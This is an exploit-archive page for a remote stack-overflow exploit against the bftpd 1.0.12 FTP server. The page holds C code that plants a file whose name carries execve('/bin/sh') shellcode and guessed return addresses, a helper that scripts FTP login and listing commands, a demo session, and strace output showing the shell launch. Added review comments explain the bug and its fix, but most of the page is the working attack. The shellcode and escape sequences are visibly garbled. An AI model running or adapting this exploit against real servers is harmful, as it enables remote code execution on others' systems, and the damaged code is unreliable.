
# Title : BFTPd 1.0.12 Remote Exploit
# Published : 2000-12-11
# Author : korty
# Previous Title : LPRng 3.6.24-1 Remote Root Exploit
# Next Title : LPRng 3.6.22/23/24 Remote Root Exploit


/*                                                                                                                                             
  Creates a filename to exploit the bug in bftpd 1.0.12
  Create the file, cwd into its directory from the FTP shell and nlist that directory.

  Coded by korty <cb@grolier.fr>
*/

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>


#define LEN 205

/*
 * Builds the trigger for the bftpd 1.0.12 listing bug and leaves it on disk
 * as a file whose NAME is the payload: LEN fill bytes whose tail is replaced
 * by the "code" string, followed by two copies of a guessed stack address and
 * a 4-byte zero terminator.  Nothing is sent from here; the server is only
 * affected later, when a client lists the directory that holds this file
 * (see the list.c helper and the strace in the trailing comment, where the
 * stat() on the long name is followed by execve("/bin/sh")).
 *
 * The return-address-overwrite layout and the 0xbffff... base address
 * suggest an unbounded copy into a fixed-size stack buffer while bftpd
 * formats the listing entry (inferred, not shown here).  Server-side fix:
 * bounds-checked formatting of the entry; generic hardening that blunts this
 * class is a non-executable stack / ASLR and running the daemon unprivileged.
 *
 * argv[1], if present, is a decimal offset added to the base address via
 * atoi() (unvalidated: non-numeric input silently contributes 0).
 *
 * Assumes Linux/x86 with a 4-byte little-endian int (see the int* writes
 * below).  The file is created in the current working directory.  main()
 * falls off the end without a return statement (exit status 0 under C99,
 * indeterminate under C89).
 */
int main (int argc, char **argv)
{
  char buf[LEN + 12];     /* LEN bytes of name payload + 2 * 4 address bytes + 4-byte terminator */
  int  ret = 0xbffffa80;  /* guessed stack address; only meaningful on a 32-bit stack without ASLR */
  int  *p;                /* write cursor for the int-sized tail of buf */
  int  fp;                /* file descriptor returned by open(), not a FILE* */
  
  /* NOTE(review): as printed on this page the escape sequences in this
   * literal are garbled (they read "x29" rather than hex escapes), so the
   * bytes the string actually holds do not match the mnemonic comments beside
   * each line.  strlen(code) below also relies on the string containing no
   * NUL byte before its end. */
  char code[]=

 /*
  *  Linux/x86
  *
  *  toupper() evasion, standard execve() /bin/sh (used eg. in various
  *  imapd exploits). Goes through a loop adding 0x20 to the 
  *  (/bin/sh -= 0x20) string (ie. yields /bin/sh after addition).
  */

  /* main: */
  "xebx29"                            /* jmp callz                   */
  /* start: */
  "x5e"                                /* popl %esi                   */
  "x29xc9"                            /* subl %ecx, %ecx             */
  "x89xf3"                            /* movl %esi, %ebx             */
  "x89x5ex08"                        /* movl %ebx, 0x08(%esi)       */
  "xb1x07"                            /* movb $0x07, %cl             */
  /* loopz: */
  "x80x03x20"                        /* addb $0x20, (%ebx)          */
  "x43"                                /* incl %ebx                   */
  "xe0xfa"                            /* loopne loopz                */
  "x29xc0"                            /* subl %eax, %eax             */
  "x88x46x07"                        /* movb %al, 0x07(%esi)        */
  "x89x46x0c"                        /* movl %eax, 0x0c(%esi)       */
  "xb0x0b"                            /* movb $0x0b, %al             */
  "x87xf3"                            /* xchgl %esi, %ebx            */
  "x8dx4bx08"                        /* leal 0x08(%ebx), %ecx       */
  "x8dx53x0c"                        /* leal 0x0c(%ebx), %edx       */
  "xcdx80"                            /* int $0x80                   */
  "x29xc0"                            /* subl %eax, %eax             */
  "x40"                                /* incl %eax                   */
  "xcdx80"                            /* int $0x80                   */
  /* callz: */
  "xe8xd2xffxffxff"                /* call start                  */
  "x0fx42x49x4ex0fx53x48";       /* /bin/sh -= 0x20             */



  if (argc > 1) {
    ret += atoi(argv[1]);   /* unvalidated offset; atoi() yields 0 for junk and does not report overflow */
    fprintf(stderr, "Using ret %#010xn", ret);
  }

  /* Fill the first LEN bytes, then overwrite the tail of that region with
   * code.  NOTE(review): 'x90' is a multi-character constant with an
   * implementation-defined value (same transcription damage as the literal
   * above; the intent is a single fill byte).  The subtraction is unchecked:
   * strlen(code) > LEN would address memory before buf. */
  memset(buf, 'x90', LEN);
  memcpy(buf + LEN - strlen(code), code, strlen(code));

  /* Append two copies of ret and a 4-byte zero after the LEN-byte payload.
   * Storing ints through a char array assumes sizeof(int) == 4 and tolerates
   * unaligned access (alignment / strict-aliasing UB in portable C).  The
   * final 0 is also what NUL-terminates buf for open(). */
  p = (int *) (buf + LEN);

  *p++ = ret;
  *p++ = ret;
  *p   = 0;

  /* Create the file.  BUG: O_CREAT requires a mode argument and none is
   * passed, so the permission bits come from an indeterminate vararg slot
   * (the strace in the trailing comment shows S_IFREG|S_ISUID|0544).
   * close() is used without <unistd.h>, i.e. implicitly declared, and it is
   * called even when open() failed (close(-1) just returns EBADF). */
  fp = open(buf, O_CREAT);
  if(fp < 0) perror("buf");
  close(fp);

}
/*

-- BEGIN list.c --


#include <stdio.h>

int main()

{

#define USER "cb"
#define PASS "PasSwoRd"
#define PORT "port 127,0,0,1,4,4"  // Data connection to 127.0.0.1 on port 1028 (4*256 + 4)
#define CWD "cwd longfile"
#define LIST "list"

printf("user %sn", USER);
sleep(1);
printf("pass %sn", PASS);
sleep(1);
printf("%sn", PORT);
sleep(1);
printf("%sn", CWD);
sleep(1);
printf("%sn", LIST);

}


-- END list.c --







  A)  DEMO  


tshaw:~/longfile$ gcc -o exploit exploit.c 
tshaw:~/longfile$ ls
exploit*  exploit.c  list.c
tshaw:~/longfile$ ls
exploit*  exploit.c  list.c
tshaw:~/longfile$ ./exploit 
tshaw:~/longfile$ ls
exploit*
exploit.c
list.c
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220313)^)311211323211^b221a20003 C
300332)300210Fa211Ff220v203323211Kb211Sf311200)300@311200310322333
33333313BIN13SH200332333233200332333233*
tshaw:~/longfile$ 

tshaw:~/longfile$ gcc -o list list.c

tshaw:~/longfile$ nc -l -p 1028 &
[1] 29973
tshaw:~/longfile$ 


tshaw:~/longfile$ (./list ; cat) | nc localhost 21
220 bftpd 1.0.12 at 127.0.0.1 ready.
331 Password please.
230 User logged in.
200 PORT 127.0.0.1:1028 OK
250 OK

150 Data connection established.
drwxr-xr-x   2 1000     100          4096 Dec  8 04:06 .
drwxr-xr-x  55 1000     100          4096 Dec  8 04:02 ..
-rw-r--r--   1 1000     100           323 Dec  8 04:06 list.c
-rwxr-xr-x   1 1000     100         11931 Dec  8 04:06 list
-rw-r--r--   1 1000     100          2178 Dec  8 03:54 exploit.c
-rwxr-xr-x   1 1000     100         12861 Dec  8 03:56 exploit
-r-xr--r--   1 1000     100             0 Dec  8 03:56 &#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;
&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;
&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;?^)??? C&#29481;)&#54594;F&#45935;
                                                                 ?
                                                                  &#45665;&#46858;S
                                                                       ?)??&#33048;&#63735;&#63735;&#63735;BINSH&#128;????

[1]+  Done                    nc -l -p 1028
tshaw:~/longfile$ 



   B)  STRACE OUTPUT


tshaw:~# ps -aef |grep bftpd

cb       30128    62  0 Dec04 ?        00:00:00 bftpd
root     30136 30024  0 Dec04 ttyqa    00:00:00 grep bftpd

tshaw:~# strace -p 30128

read(0, "n", 4096)                     = 1
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(4, SOL_SOCKET, SO_SNDBUF, [65536], 4) = 0
bind(4, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
connect(4, {sin_family=AF_INET, sin_port=htons(1028), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
write(2, "150 Data connection established."..., 34) = 34
open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOENT (No such file or directory)
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
open(".", O_RDONLY|O_NONBLOCK|0x10000)  = 5
fstat(5, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
fcntl(5, F_SETFD, FD_CLOEXEC)           = 0
brk(0x8052000)                          = 0x8052000
getdents(5, /* 7 entries */, 3933)      = 328
stat("./.", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x   2 1000     100     "..., 58, 0) = 58
stat("./..", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x  55 1000     100     "..., 59, 0) = 59
stat("./list.c", {st_mode=S_IFREG|0644, st_size=323, ...}) = 0
send(4, "-rw-r--r--   1 1000     100     "..., 63, 0) = 63
stat("./list", {st_mode=S_IFREG|0755, st_size=11931, ...}) = 0
send(4, "-rwxr-xr-x   1 1000     100     "..., 61, 0) = 61
stat("./exploit.c", {st_mode=S_IFREG|0644, st_size=2178, ...}) = 0
send(4, "-rw-r--r--   1 1000     100     "..., 66, 0) = 66
stat("./exploit", {st_mode=S_IFREG|0755, st_size=12861, ...}) = 0
send(4, "-rwxr-xr-x   1 1000     100     "..., 64, 0) = 64
stat("./&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;?
&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47537;&#47662;)^)??? C&#29481;)&#54594;F&#45935;
                  ?
                   &#45665;&#46858;S
                        ?)??&#33048;&#63735;&#63735;&#63735;BINSH&#128;????, {st_mode=S_IFREG|S_ISUID|0544, st_size=0, ...}) = 0
send(4, "-r-xr--r--   1 1000     100     "..., 270, 0) = 270
execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = -1 ENOENT (No such file or directory)
_exit(-1073743151)                      = ?

tshaw:~# 

*/

